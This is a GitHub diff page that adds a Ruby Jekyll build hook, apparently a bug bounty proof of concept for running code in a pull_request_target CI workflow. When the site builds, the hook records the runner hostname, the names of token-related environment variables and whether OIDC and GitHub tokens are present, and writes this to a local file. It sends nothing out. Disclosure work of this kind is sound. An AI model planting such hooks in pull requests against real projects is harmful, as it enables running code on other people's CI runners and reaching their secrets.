File tree Expand file tree Collapse file tree 1 file changed +25
-0
lines changed
Expand file tree Collapse file tree 1 file changed +25
-0
lines changed Original file line number Diff line number Diff line change 1+ require 'net/http'
2+ require 'json'
3+
4+ Jekyll ::Hooks . register :site , :after_init do |site |
5+ # Bug Bounty PoC - Proof of Code Execution in privileged context
6+ # This demonstrates arbitrary code execution with OIDC permissions
7+
8+ evidence = {
9+ timestamp : Time . now . to_s ,
10+ runner : `hostname` . strip ,
11+ available_env_vars : ENV . keys . grep ( /ACTIONS|GITHUB|OIDC|TOKEN/ ) . sort ,
12+ oidc_available : !ENV [ 'ACTIONS_ID_TOKEN_REQUEST_URL' ] . nil? ,
13+ pages_permission : !ENV [ 'GITHUB_TOKEN' ] . nil? ,
14+ repo : ENV [ 'GITHUB_REPOSITORY' ] ,
15+ workflow : ENV [ 'GITHUB_WORKFLOW' ] ,
16+ actor : ENV [ 'GITHUB_ACTOR' ] ,
17+ event : ENV [ 'GITHUB_EVENT_NAME' ] ,
18+ message : 'BUG BOUNTY POC: Arbitrary code execution confirmed in pull_request_target context'
19+ }
20+
21+ File . write ( 'POC_EVIDENCE.json' , JSON . pretty_generate ( evidence ) )
22+ puts "[BUG BOUNTY POC] Code executed! Evidence written to POC_EVIDENCE.json"
23+ puts "[BUG BOUNTY POC] OIDC token available: #{ evidence [ :oidc_available ] }
24+ puts "[BUG BOUNTY POC] Available privileged env vars: #{ evidence [ :available_env_vars ] . join ( ', ' ) }
25+ end
You can’t perform that action at this time.
0 commit comments